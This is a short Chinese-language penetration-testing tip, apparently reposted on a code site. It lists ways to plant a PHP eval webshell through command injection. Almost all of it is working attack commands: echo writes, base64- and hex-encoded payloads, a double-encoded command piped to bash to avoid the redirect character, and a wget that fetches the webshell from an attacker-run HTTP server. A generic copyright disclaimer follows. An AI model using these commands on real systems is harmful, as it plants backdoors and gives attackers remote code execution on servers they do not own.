滲透tip-----命令執行寫入webshell


1.echo直接寫入

echo '<?php eval($_POST[1]); ?>' > 1.php

2.base64寫入

echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php

3.繞過重定向符

echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | bash
echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | sh
重定向符>不可用時,我們可以將1或2中的整體命令base64編碼

4.遠端下載webshell

遠端服務器放置webshell,開啟httppython -m http.server
目標機器執行wget http://xx.xx.xxx.xx:8000/xxx.php

5.hex寫入

hex寫入與base64寫入相似,在 https://www.107000.com/T-Hex/
將webshell編碼成hex,使用xxd命令還原

或在使用前將webshell使用xxd生成hex數據

echo '<?php eval($_POST[1]); ?>' |xxd -ps

然后命令注入執行

echo 3C3F706870206576616C28245F504F53545B315D293B203F3E|xxd -r -ps > 5.php


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM